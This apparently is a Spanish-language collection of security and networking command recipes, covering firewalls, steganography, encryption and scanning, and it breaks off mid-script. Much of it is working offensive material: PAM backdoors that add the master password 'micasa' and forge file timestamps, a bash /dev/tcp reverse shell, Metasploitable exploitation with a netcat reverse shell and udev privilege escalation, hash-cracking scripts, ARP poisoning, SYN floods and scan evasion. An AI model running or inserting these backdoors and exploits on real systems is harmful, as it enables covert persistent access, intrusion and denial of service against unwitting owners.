external_host             None  (perm, OK)  0   IP    192.168.1.2
internal_host             None  (perm, OK)  0   IP    192.168.0.2

internal_host#ping external_host
!!!!!

Router(config)#access-list 100 deny ip any any
Router(config)#int fa0/0
Router(config-if)#ip access-group 100 in

internal_host#ping external_host
....

Router(config)#ip inspect name allow_icmp icmp
Router(config)#int fa0/0
Router(config-if)#ip inspect allow_icmp out

internal_host#ping external_host
!!!!!

ZFW (Zone-Based Policy Firewall)

Router#show run | i ^interface|^ description|^ ip
interface FastEthernet0/0
 description outside
 ip address 192.168.1.1 255.255.255.0
interface FastEthernet0/1
 description inside
 ip address 192.168.0.1 255.255.255.0
Router#show hosts | i IP                    
external_host             None  (perm, OK)  0   IP    192.168.1.2
internal_host             None  (perm, OK)  0   IP    192.168.0.2

internal_host#ping external_host
!!!!!

Router(config)#zone security outside_zone
Router(config)#zone security inside_zone
Router(config)#int fa0/0
Router(config-if)#zone-member security outside_zone
Router(config-if)#int fa0/1
Router(config-if)#zone-member security inside_zone

internal_host#ping external_host
....

Router(config)#class-map type inspect match-any icmp_map
Router(config-cmap)#match protocol icmp
Router(config)#policy-map type inspect icmp_policy
Router(config-pmap)#class type inspect icmp_map
Router(config-pmap-c)#inspect
Router(config)#zone-pair security inside2outside source inside_zone destination outside_zone
Router(config-sec-zone-pair)#service-policy type inspect icmp_policy

internal_host#ping external_host
!!!!!

# Linux backdoor con pam_ldap.so

Introducción

PAM

Ejecución

# apt-get install dpkg-dev flex libldap2-dev 
# dpkg --search pam_ldap.so
# apt-get source libpam-ldap=`dpkg -s libpam-ldap \
| grep -i version | cut -d' ' -f2`
# midir=`pwd`
# cd libpam-ldap-184/
# tar xvzf pam_ldap-184.tar.gz
# cd pam_ldap-184
# ln -s $midir/pam-1.1.1/libpam/include/security/ /usr/include/security
# sed -i '/^  _connect_anonymously/ a \ \ if (strcmp(password, "micasa") == 0) { rc = PAM_SUCCESS; }' pam_ldap.c
# ./configure
# make
# cd
# timestamp=`ls -l /lib/security/ | grep pam_ldap.so \
> | awk '{print $6$7}' | tr -d '-' | tr -d ':'`
# cp /lib/security/pam_ldap.so .
# cp $midir/libpam-ldap-184/pam_ldap-184/pam_ldap.so /lib/security/.
# touch -t $timestamp /lib/security/pam_ldap.so

# Sockets con bash

Introducción

/dev

Ejecución

Petición http sin esperar respuesta

# echo "get /" > /dev/tcp/www.google.com/80

Petición y respuesta http

# exec 3<>/dev/tcp/www.google.com/80
# echo "get /" >&3
# cat <&3
# exec 3>&-

Enviar una shell inversa desde local a remoto

remoto# nc -v -l 192.168.0.10 1234
local# exec 4<>/dev/tcp/192.168.0.10/1234
local# cat <&4 | while read line; do $line 2>&4 >&4; done
remoto#
>hostname
>local

# Configuración inicial sin reload

Introducción

Para obtener la configuración inicial por defecto en los dispositivos Cisco borramos dos ficheros (nvram:startup-config y flash:vlan.dat) y seguidamente reiniciamos el dispositivo (reload).
Para obtener una configuración equivalente a la inicial pero sin reiniciar el dispositivo (ahorrando el tiempo de espera) podemos seguir el siguiente procedimiento.

Ejecución

#! Lo primero que hacemos después de
#! arrancar el dispositivo
#copy system:running-config flash:initial-config
#! Después configuramos el dispositivo
#! Cuando queramos recuperar la configuración
#! equivalente a la inicial, ejecutamos:
#configure replace flash:initial-config force
#delete /force flash:vlan.dat

# Esteganografía en imágenes jpg

Introducción

Steghide

Ejecución

# apt-get install steghide
# wget -O luna.jpg http://tinyurl.com/6earlrf
# steghide info luna.jpg | grep -i cap
  capacidad: 1,5 KB
# ls -la > listado
# steghide --embed -cf luna.jpg -ef listado
# mv listado listado.orig
# steghide --extract -sf luna.jpg
# diff listado listado.orig
#

# Symmetric encryption from the command-line

OpenSSL

# openssl enc -aes-256-cbc -salt -in msg.txt -out msg.txt.enc
# openssl enc -aes-256-cbc -d -in msg.txt.enc -out msg.txt
# date | openssl enc -aes-256-cbc -salt -out msg.txt.enc
# openssl enc -aes-256-cbc -d -in msg.txt.enc > msg.txt

GnuPG

# gpg --cipher-algo AES256 --symmetric -o msg.txt.enc msg.txt
# gpg --decrypt -o msg.txt msg.txt.enc
# date | gpg --cipher-algo AES256 --symmetric -o msg.txt.enc
# gpg --decrypt msg.txt.enc > msg.txt

Mcrypt

# mcrypt --algorithm rijndael-256 --bare msg.txt
# mcrypt --algorithm rijndael-256 --bare --decrypt msg.txt.nc
# date | mcrypt --algorithm rijndael-256 --bare > msg.txt.nc
# cat msg.txt.nc | mcrypt --algorithm rijndael-256 --bare --decrypt > msg.txt

Ccrypt

# ccrypt --encrypt msg.txt
# ccrypt --decrypt msg.txt.cpt
# date | ccrypt --encrypt > msg.txt.cpt
# cat msg.txt.cpt | ccrypt --decrypt > msg.txt

# Esteganografía en ficheros de texto

Introducción

Snow

Ejecución

# mkdir snow
# cd snow
# wget http://www.darkside.com.au/snow/snow-20091217.tar.gz
# tar xvzf snow-20091217.tar.gz
# cd snow-20091217
# make
# ./snow -S main.c
File has storage capacity of between 5669 and 6275 bits.
Approximately 746 bytes.
# ./snow -C -Q -p "micon" -m "tracking" main.c main_modificado.c
# ./snow -C -p "micon" main_modificado.c
tracking

# Borrar de forma segura

Introducción

Secure-delete

Ejecución

# srm -vz punto_montaje/fichero.pdf # fichero
# sfill -vz punto_montaje/ # espacio libre de un disco
# swapoff /dev/sda5; sswap -vz /dev/sda5; swapon /dev/sda5 # swap
# sdmem -vz # ram

# Linux backdoor con pam_unix.so

Introducción

PAM

Ejecución

# apt-get install dpkg-dev flex
# apt-get source libpam-modules=`dpkg -s libpam-modules \
> | grep -i version | cut -d' ' -f2`
# cd pam-1.1.1/modules/pam_unix/
# sed -i '/\tretval = _unix_verify_password(pamh, name, p, ctrl);/ a \\tif (strcmp(p, \"micasa\") == 0) { retval = PAM_SUCCESS; }' pam_unix_auth.c
# cd ../..
# ./configure
# make
# cd
# timestamp=`ls -l /lib/security/ | grep pam_unix.so | grep -v ^l \
> | awk '{print $6$7}' | tr -d '-' | tr -d ':'`
# cp /lib/security/pam_unix.so .
# cp pam-1.1.1/modules/pam_unix/.libs/pam_unix.so /lib/security/.
# touch -t $timestamp /lib/security/pam_unix.so

# Traceroute con hping3

Introducción

hping3

Ejecución

# hping3 -S -p 22 -n --traceroute --tr-no-rtt --fast 192.168.8.1
HPING server1.network8.local (eth0 192.168.8.1): S set, 40 headers + 0 data bytes
hop=1 TTL 0 during transit from ip=192.168.1.1
hop=2 TTL 0 during transit from ip=192.168.2.1
hop=3 TTL 0 during transit from ip=192.168.3.1
hop=4 TTL 0 during transit from ip=192.168.4.1
hop=5 TTL 0 during transit from ip=192.168.5.1
hop=6 TTL 0 during transit from ip=192.168.6.1
ctrl+z
8: len=50 ip=192.168.8.1 ttl=57 DF id=0 sport=22 flags=SA seq=24 win=5840 rtt=27.7 ms

# Reto contraseñas postgres (md5, salt)

Introducción

En el reto 'networking 3' del wargame de sbd 2011 proporcionan un pcap con el proceso de autenticación contra una base de datos postgres.
Usuario: postgres
Salt: 0e5da2d1
Contraseña: 6fcd671f668c3c8efca3308f6f41bd17

Ejecución

# cat diccionario.txt
hack
tracking
Jixi
wargame
# cat postgres_md5_salt.sh
#!/bin/bash

function hex2ascii {
 printf %s $1 | xxd -r -p
}
function md5 {
 printf %s $1 | md5sum | cut -d ' ' -f1
}

user=$1
salt=`hex2ascii $2`
password_file=$3
captured_password=$4

while read secret
do
 hash_stage_1=`md5 $secret$user`
 #echo $hash_stage_1
 generated_password=`md5 $hash_stage_1$salt`
 #echo $generated_password
 if [ $generated_password == $captured_password ]
 then
  echo "$secret --> $captured_password"
 fi
done < $password_file
# ./postgres_md5_salt.sh postgres 0e5da2d1 \
diccionario.txt \
6fcd671f668c3c8efca3308f6f41bd17
Jixi --> 6fcd671f668c3c8efca3308f6f41bd17

# Reto contraseñas mysql (sha1, salt)

Introducción

En el reto 'networking 2' del wargame de sbd 2011 proporcionan un pcap con el proceso de autenticación contra una base de datos mysql.
Utilizaremos un salt y una contraseña distintos.
Salt: x8MXV%QLgDZ{ypGN6^Y#
Contraseña: d648fcba578670abf1ec93b0dce1b41f681dc71c

Ejecución

# cat diccionario.txt
hack
tracking
wargame
# cat mysql_sha1_salt.sh
#!/bin/bash

function dec2hex {
 printf %x $1
}
function hex2ascii {
 printf %s $1 | xxd -r -p
}
function hex2dec {
 printf %d $1
}
function sha1 {
 printf %s $1 | sha1sum | cut -d ' ' -f1
}
function xor {
 length=$[$1-1]
 string_a=$2
 string_b=$3
 for i in `seq 0 $length`
 do
  a=`hex2dec 0x${string_a:$i:1}`
  b=`hex2dec 0x${string_b:$i:1}`
  xored=$xored`dec2hex $(printf '%d' $[$a^$b])`
 done
 printf %s $xored
}

salt=$1
password_file=$2
captured_password=$3

while read secret
do
 hash_stage_1=`sha1 $secret`
 hash_stage_1_=`hex2ascii $hash_stage_1`
 #echo $hash_stage_1
 hash_stage_2=`sha1 $hash_stage_1_`
 hash_stage_2_=`hex2ascii $hash_stage_2`
 #echo $hash_stage_2
 hash_stage_3=`sha1 $salt$hash_stage_2_`
 #echo $hash_stage_3
 generated_password=`xor 40 $hash_stage_1 $hash_stage_3`
 #echo $generated_password
 if [ $generated_password == $captured_password ]
 then
  echo "$secret --> $captured_password"
 fi
done < $password_file
# ./mysql_sha1_salt.sh x8MXV%QLgDZ{ypGN6^Y# \
diccionario.txt \
d648fcba578670abf1ec93b0dce1b41f681dc71c
tracking --> d648fcba578670abf1ec93b0dce1b41f681dc71c

# Mausezahn (interactive mode)

Introducción

Mausezahn

Instalación

# cd
# mkdir mz
# cd mz
# wget http://www.perihel.at/sec/mz/mz-0.40.tar.gz
# tar xvzf mz-0.40.tar.gz
# cd mz-0.40
# apt-get install cmake
# apt-get install libpcap0.8-dev
# apt-get install libnet1-dev
# apt-get install libcli-dev
# cmake .
# make

Ejecución

# cd src/
# ./mz -x 1234
# telnet localhost 1234
Escape character is '^]'.

Username: mz
Password: mz

mz-0.40> en
Password: mops
mz-0.40# show ?
mz-0.40# conf t
mz-0.40(config)# packet
mz-0.40(config-pkt-2)# ?
mz-0.40(config-pkt-2)# name prueba
mz-0.40(config-pkt-2)# desc Esto es una prueba
mz-0.40(config-pkt-2)# ip address source 192.168.1.110
mz-0.40(config-pkt-2)# ip address destination 192.168.1.1
mz-0.40(config-pkt-2)# port destination 80
mz-0.40(config-pkt-2)# tag ?
mz-0.40(config-pkt-2)# interval ?
mz-0.40(config-pkt-2)# count ?
mz-0.40(config-pkt-2)# count 1
mz-0.40(config-pkt-2)# delay ?
mz-0.40(config-pkt-2)# type ?
mz-0.40(config-pkt-2)# type tcp
mz-0.40(config-pkt-2-tcp)# flags syn
mz-0.40(config-pkt-2-tcp)# end
mz-0.40(config-pkt-2)# payload ascii Envío de un syn tcp
mz-0.40(config-pkt-2)# end
mz-0.40(config)# exit
mz-0.40# show packet 2
mz-0.40# run id 2
mz-0.40# launch ?
mz-0.40# launch bpdu
mz-0.40# stop 3
mz-0.40# launch synflood 192.168.1.1
mz-0.40# stop all
mz-0.40# exit
# cat > f.mops << eof
> conf t
> packet
> count 1
> payload hex 64:68:0c:ab:5f:f3:aa:00 04:00:0a:04:08:00:45:00 00:3c:2d:00:00:00:ff:06 0a:fc:c0:a8:01:6e:c0:a8 01:01:00:00:00:50:ca:fe ba:be:00:00:00:00:50:02 00:64:23:43:00:00:45:6e 76:c3:ad:6f:20:64:65:20 75:6e:20:73:79:6e:20:74 63:70
> eof
# telnet localhost 1234
mz-0.40# load ./f.mops
mz-0.40# run id 5

# Mausezahn (direct mode)

Introducción

Mausezahn

Instalación

# apt-get install mz

Tipos de paquetes

# mz -t help

|  The following packet types are currently implemented:
|
|  arp            ... sends ARP packets
|  bpdu           ... sends BPDU packets (STP)
|  cdp            ... sends CDP messages
|  ip             ... sends IPv4 packets
|  udp            ... sends UDP datagrams
|  tcp            ... sends TCP segments
|  icmp           ... sends ICMP messages
|  dns            ... sends DNS messages
|  rtp            ... sends RTP datagrams
|  syslog         ... sends Syslog messages

# mz eth0 -t ip -P "hola mundo" # payload ascii
# mz eth0 -t ip "p=68:6f:6c:61:20:6d:75:6e:64:6f,ttl=1" # payload hexadecimal

Repetición y retardo

# Infinitos paquetes
# mz eth0 -c 0 -t dns "q=www.perihel.at" -B 8.8.8.8
# 100 paquetes, uno cada 2 segundos
# mz eth0 -c 100 -d 2s -t dns "q=www.perihel.at" -B 8.8.8.8

Direcciones de origen y destino

# @mac origen y destino
# mz eth0 -t arp "request,targetip=192.168.1.100" \
-a own -b ff:ff:ff:ff:ff:ff
# @ip origen y destino
# mz eth0 -t dns "q=www.perihel.at" -A rand -B 8.8.8.8

Tramas raw de nivel 2

# mz eth0 -c 0 -a rand -b bcast -p 1000 "08:00-ca-fe-03:e8"

Trama arp

# Envenenamiento de la cache arp
# mz eth0 -t arp "reply,sip=192.168.1.1,\
tmac=aa:00:04:00:0a:04,tip=192.168.1.50"

Trama bpdu

# Anunciamiento como puente raíz de la vlan 1
# mz eth0 -t bpdu "pri=0,vlan=1"

Trama cdp

# Llena la base de datos del dispositivo vecino con tlv_id aleatorios
# mz eth0 -c 0 -a rand -t cdp change

Trama 802.1q

# Vlan=500 y CoS=7
# mz eth0 -Q 7:500 -t icmp ping
# Vlan_externa=100 y vlan_interna=200
# mz eth0 -Q 100,200 -t icmp ping

Trama mpls

# Etiqueta_externa=200 y etiqueta_interna=100
# mz eth0 -M 100,200 -t icmp ping

Paquete ip

# Con paquete raw icmp
# mz eth0 -t ip "dscp=46,ttl=1,proto=1,\
p=08:00-8b:86-de:ad-be:af-68:6f:6c:61:20:6d:75:6e:64:6f"

Segmento udp

# Con paquete raw dns
mz eth0 -t udp "dp=53,p=c5:2f-01:00-00:01-00:00-00:00-00:00-\
03:77:77:77:07:70:65:72:69:68:65:6c:02:61:74:00-00:01-00:01"

Segmento tcp

# Inundación tcp syn al puerto 80
# mz eth0 -A rand -B 192.168.1.50 -t tcp "sp=7,dp=80,flags=syn" -P "DoS test"
# Finaliza la sesión tcp repitiendo el último nseq entre A y B
# mz eth0 -A 192.168.1.50 -B 192.168.1.1 -t tcp "sp=36772,dp=23,flags=rst,s=1090420293"

Protocolo rtp

# Medición del jitter, perdida de paquetes y reordenación
# mz lo -T rtp id=12:34:56:78 # servidor
# mz eth0 -B 192.168.1.50 -t rtp id=12:34:56:78 # cliente

Protocolo syslog

# Envío de mensaje falsificando la @ip de origen
# mz -A 192.168.1.50 -B 192.168.1.1 -t syslog sev=0 
\ -P "Mensaje enviado al servidor syslog"

# Autopwn

Introducción

Autopwn

Ejecución

# svn update /opt/metasploit3/msf3/
# msfconsole
msf > db_nmap -PN -sS -sV 192.168.1.50

Interesting ports on 192.168.1.50:
Not shown: 988 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.1
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB
8009/tcp open  ajp13?
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux

msf > db_autopwn -h
[*] Usage: db_autopwn [options]
        -h          Display this help text
        -t          Show all matching exploit modules
        -x          Select modules based on vulnerability references
        -p          Select modules based on open ports
        -e          Launch exploits against all matched targets
        -r          Use a reverse connect shell
        -b          Use a bind shell on a random port (default)
        -q          Disable exploit module output
        -R  [rank]  Only run modules with a minimal rank
        -I  [range] Only exploit hosts inside this range
        -X  [range] Always exclude hosts inside this range
        -PI [range] Only exploit hosts with these ports open
        -PX [range] Always exclude hosts with these ports open
        -m  [regex] Only run modules whose name matches the regex
        -T  [secs]  Maximum runtime for any exploit in seconds
msf > db_autopwn -t -p -e
Active sessions
===============

  Id  Type       Connection                                Via
  --  ----       ----------                                ---
  1   shell php  192.168.1.100:40803 -> 192.168.1.50:5452  exploit/unix/webapp/tikiwiki_graph_formula_exec


msf > session -i 1
msf > db_autopwn -t -x -e
Active sessions
===============

  Id  Type       Connection                                 Via
  --  ----       ----------                                 ---
  2   shell php  192.168.1.100:39008 -> 192.168.1.50:12186  exploit/unix/webapp/tikiwiki_graph_formula_exec

msf > session -i 2

# Nmap

Introducción

Nmap

Normal (tcp syn)

# nmap 192.168.0.1

Varios objetivos

# nmap 192.168.0.1 192.168.0.2
# nmap 192.168.0.1-10
# nmap 192.168.0.0/24
# cat > objetivos.txt << eof
> 192.168.0.11
> 192.168.0.51
> 192.168.0.101
> eof
# nmap -iL objetivos.txt
# nmap 192.168.0.0/24 --exclude 192.168.0.10-100
# nmap 192.168.0.0/24 --excludefile objetivos.txt

Descubrimiento

# nmap -PN 192.168.0.1 # no hagas ping
# nmap -PS 192.168.0.1 # ping tcp syn
# nmap -PA 192.168.0.1 # ping tcp ack
# nmap -PU 192.168.0.1 # ping udp
# nmap -PY 192.168.0.1 # ping sctp init
# nmap -PE 192.168.0.1 # ping icmp echo
# nmap -PP 192.168.0.1 # ping icmp timestamp
# nmap -PM 192.168.0.1 # ping icmp address mask
# nmap -PO 192.168.0.1 # ping protocolo ip
# nmap -PP 192.168.0.1 # ping arp
# nmap ---traceroute 192.168.0.1 # traceroute

Escaneo

# nmap -sP 192.168.0.1 # solo ping
# nmap -sS 192.168.0.1 # tcp syn
# nmap -sT 192.168.0.1 # tcp connect (three-way-handshake)
# nmap -sU 192.168.0.1 # udp
# nmap -sN 192.168.0.1 # tcp null
# nmap -sF 192.168.0.1 # tcp fin
# nmap -sA 192.168.0.1 # tcp ack
# nmap -sX 192.168.0.1 # tcp christmas tree (fin + push + urg)
# nmap --scanflags URGACKPSHRSTSYNFIN 192.168.0.1 # tcp a medida
# nmap -F 192.168.0.1 # escaneo rápido (los 100 puertos más conocidos)
# nmap --top-ports 10 192.168.0.1 # los 10 puertos más conocidos
# nmap -p http,https 192.168.0.1 # nombre de puertos
# nmap -p 1-80 192.168.0.1 # rango de puertos
# nmap -p U:1-50,T:51-100 192.168.0.1 # rango de puertos por protocolo
# nmap -p "*" -r 192.168.0.1 # todos los puertos secuencialmente

Detección

# nmap -O 192.168.0.1 # sistema operativo
# nmap -sV 192.168.0.1 # versión de los servicios

Evasión

# nmap -f 192.168.0.1 # fragmentar en paquetes ip de 8 bytes
# nmap --mtu 16 192.168.0.1 # fragmentar en paquetes ip de 16 bytes
# nmap -D RND:5 192.168.0.1 # genera 5 @ip aleatorias (señuelos)
# nmap -sI 192.168.0.10 192.168.0.1 # escaneo utilizando un zombie
# nmap --source-port 80 192.168.0.1 # puerto de origen 80
# nmap --data-length 40 bytes 192.168.0.1 # añade 40 bytes
# nmap --spoof-mac 0 192.168.0.1 # utiliza una @mac de origen aleatoria

Formato de salida

# nmap -oN ft.txt 192.168.0.1 # fichero de texto
# nmap -oX fx.xml 192.168.0.1 # fichero xml

# Flujos alternativos de datos (ADS)

Introducción

Alternate Data Streams

Ejecución

>mkdir ADS
>cd ADS
>echo "Información visible" > f.txt
>echo "Información oculta" > f.txt:s1.txt
>more < f.txt
"Información visible"

>more < f.txt:s1.txt
"Información oculta"

>notepad f.txt:s1.txt
>type %systemroot%\system32\calc.exe > f.txt:s2.exe
>start .\f.txt:s2.exe
>type %systemroot%\media\tada.wav > ..\ADS:tada.wav
>start ..\ADS:tada.wav

# Metasploitable (samba)

Introducción

Samba: Remote Command Injection Vulnerability

Ejecución

# msfconsole
msf > nmap -sV -O -p 100-500 192.168.1.50
[*] exec: nmap -sV -O -p 100-500 192.168.1.50

Not shown: 399 closed ports
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.28
Network Distance: 1 hop

msf > search samba
msf > use multi/samba/usermap_script
msf exploit(usermap_script) > set rhost 192.168.1.50
msf exploit(usermap_script) > set rport 445
msf exploit(usermap_script) > set payload cmd/unix/reverse
msf exploit(usermap_script) > set lhost 192.168.1.100
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo fXQUYEFiaAED6rM4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "fXQUYEFiaAED6rM4\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.100:4444 -> 192.168.1.50:58167)
uname -a
Linux metasploitable 2.6.24-16-server i686 GNU/Linux
whoami
root

# Metasploitable (postgres + openssl)

Introducción

Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)

Ejecución

# msfconsole
msf > nmap -sV -O -p 22,5432 192.168.1.50
[*] exec: nmap -sV -O -p 22,5432 192.168.1.50

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
5432/tcp open  postgresql PostgreSQL DB
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.28
Network Distance: 1 hop
Service Info: OS: Linux

msf > search postgres
msf > use scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set rhosts 192.168.1.50
msf auxiliary(postgres_login) > exploit
[+] 192.168.1.50:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
[+] 192.168.1.50:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(postgres_login) > psql -h 192.168.1.50 -U postgres -W
[*] exec: psql -h 192.168.1.50 -U postgres -W

Password for user postgres:
create table sshkey (input text);
copy sshkey from '/root/.ssh/authorized_keys';
select * from sshkey;
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
(1 fila)

# wget http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
# tar xvjf debian_ssh_rsa_2048_x86.tar.bz2
# cd rsa/2048
# grep -l AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
57c3115d77c56390332dc5c49978627a-5429.pub
# ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.50
root@metasploitable:~# uname -a
Linux metasploitable 2.6.24-16-server
root@metasploitable:~# whoami
root

# Metasploitable (distccd + udev)

Introducción

Metasploitable virtual machine (01, 02, 03, 04)
udev < 141 Local Privilege Escalation Exploit

Ejecución

# msfconsole
msf > nmap -sV -O -p 1-65535 192.168.1.50
[*] exec: nmap -sV -O -p 1-65535 192.168.1.50

Not shown: 65523 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  netbios-ssn 
3306/tcp open  mysql
3632/tcp open  distccd
5432/tcp open  postgresql
8009/tcp open  ajp13
8180/tcp open  http
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.28
Network Distance: 1 hop
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux

msf > search distccd
msf > use unix/misc/distcc_exec
msf exploit(distcc_exec) > show options
msf exploit(distcc_exec) > set rhost 192.168.1.50
msf exploit(distcc_exec) > show payloads
msf exploit(distcc_exec) > set payload cmd/unix/bind_ruby

# nc -vl 1234

msf exploit(distcc_exec) > exploit

[*] Started bind handler
[*] Command shell session 1 opened (192.168.1.100:56362 -> 192.168.1.50:4444)

uname -a
Linux metasploitable 2.6.24-16-server
whoami
daemon
wget http://www.exploit-db.com/download/8572
mv index.html cve-2009-1185.c
gcc -o cve-2009-1185 cve-2009-1185.c
echo "#!/bin/sh\n/bin/netcat -e /bin/sh 192.168.1.100 1234" > /tmp/run
ps axuf | grep udev | grep -v grep
root      2479  0.0  0.0   2104   708 ?        Ss  05:32   0:00 /sbin/udevd --daemon
./cve-2009-1185 2478 # =2479-1

# nc -vl 1234
Connection from 192.168.1.50 port 1234 [tcp/*] accepted
uname -a
Linux metasploitable 2.6.24-16-server
whoami
root

# Instalar metasploit

Introducción

Instalación en Ubuntu

Instalación de metasploit

# cat /etc/lsb-release | grep DESC
DISTRIB_DESCRIPTION="Ubuntu 10.04.1 LTS"
# cd
# apt-get install ruby libopenssl-ruby libyaml-ruby \
libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems
# apt-get install subversion
# apt-get install build-essential ruby-dev libpcap-dev
# mkdir metasploit
# cd metasploit
# wget http://updates.metasploit.com/data/releases/framework-3.5.1.tar.bz2
# tar xvjf framework-3.5.1.tar.bz2
# mkdir -p /opt/metasploit3
# cp -a msf3/ /opt/metasploit3/msf3
# ln -sf /opt/metasploit3/msf3/msf* /usr/local/bin/
# svn update /opt/metasploit3/msf3/
# cd ..
# rm -rf metasploit

Instalación de postgres

# apt-get install postgresql-8.4
# apt-get install rubygems libpq-dev
# gem install pg
# apt-get install libreadline-dev
# apt-get install libssl-dev
# apt-get install libpq5
# apt-get install ruby-dev

Configuración de postgres

# su postgres
$ createuser msf_user -P
Enter password for new role: 
Enter it again: 
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
$ createdb --owner=msf_user msf_database

Configuración de Metasploit

# cat > ~/.msf3/msfconsole.rc << eof
> db_driver postgresql
> db_connect msf_user:password@127.0.0.1:5432/msf_database
> db_workspace -a MiProyecto
> eof

Habilitar el módulo rack sockets

# cd /opt/metasploit3/msf3/external/pcaprub/
# ruby extconf.rb
# make && make install

Habilitar el módulo wifi

# cd  /opt/metasploit3/msf3/external/ruby-lorcon2/
# svn co http://802.11ninja.net/svn/lorcon/trunk lorcon2
# cd lorcon2
# ./configure --prefix=/usr && make && make install
# cd ..
# ruby extconf.rb
# make && make install

# Reduh

Introducción

Utilizamos telnet para conectarnos a un router interno y pivotamos en un servidor web.
El tráfico telnet está encapsulado por un túnel HTTP entre local y servidor.
El router recibe la conexión telnet desde la @ip de servidor.

Reduh

Ejecución

local# java -jar reDuhClient.jar http://servidor/reDuh.php
[Info]Querying remote web page for usable remote service port
[Info]Remote RPC port chosen as 42005
[Info]Attempting to start reDuh from servidor:80/reDuh.php.  Using service port 42005. Please wait...
[Info]reDuhClient service listener started on local port 1010
local# ncat local 1010
Welcome to the reDuh command line
>>[createTunnel]1234:router:23
 Successfully bound locally to port 1234. Awaiting connections.

>>
local# telnet local 1234

# Túneles sobre SSH

Introducción

Utilizamos telnet para conectarnos a un router interno pero antes pivotamos en un servidor SSH.
El tráfico telnet está cifrado por un túnel SSH entre local y servidor.
El router recibe la conexión telnet desde la @ip de servidor.

Ejecución estática

local# ssh -L 1234:router:23 -f -N usuario@servidor
local# telnet local 1234

Ejecución dinámica (SOCKS)

local# ssh -D 1080 -f -N usuario@servidor
local# cat /etc/tsocks.conf | grep -v -e ^# -e ^$
server = 127.0.0.1
server_type = 5
server_port = 1080
local# tsocks telnet router 23

# Opa

Introducción

Para conocer los puertos abiertos de salida a Internet ejecutaremos el script opa en local y escucharemos con tcpdump en la máquina remota.

remoto# stdbuf -o0 \
tcpdump -tni eth0 src net 82.81.233.0/24 2> /dev/null \
| awk -W interactive '{print $2,$3,$4}'
local# cat opa
#!/bin/bash
#
# NAME
#       opa - Outbound Port Agent
#
# SYNOPSIS
#       ./opa remote_ip from_port to_port [udp_mode]
#
# EXEMPLE
#       ./opa 79.159.199.15 1 65535
#       ./opa 79.159.199.15 1 1024 -u

ip=$1
from=$2
to=$3
udp=$4
counter=0

#echo "Checked ports:"
for port in `seq $from $to`
do
 if [ $counter -eq 9 ]; then
  killall nc 2> /dev/null
#  echo $port
  counter=0
 else
